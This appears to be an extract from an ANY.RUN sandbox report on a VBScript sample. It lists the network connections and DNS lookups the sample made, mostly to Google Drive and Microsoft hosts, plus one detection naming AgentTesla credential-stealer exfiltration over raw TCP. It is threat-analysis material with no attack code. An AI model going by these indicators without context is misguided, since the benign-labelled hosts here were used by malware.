51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
700
svchost.exe
142.250.186.78:443
drive.google.com
GOOGLE
US
whitelisted
700
svchost.exe
142.250.186.65:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
3996
svchost.exe
20.190.159.23:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1260
backgroundTaskHost.exe
104.126.37.162:443
www.bing.com
Akamai International B.V.
DE
unknown
1260
backgroundTaskHost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
ocsp.digicert.com
  • 192.229.221.95
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
drive.google.com
  • 142.250.186.78
shared
drive.usercontent.google.com
  • 142.250.186.65
unknown
www.bing.com
  • 104.126.37.162
  • 104.126.37.161
  • 104.126.37.163
  • 104.126.37.171
  • 104.126.37.168
  • 104.126.37.160
  • 104.126.37.147
  • 104.126.37.155
  • 104.126.37.153
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
ocsp.pki.goog
  • 172.217.16.131
whitelisted

Threats

PID
Process
Class
Message
3352
wab.exe
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs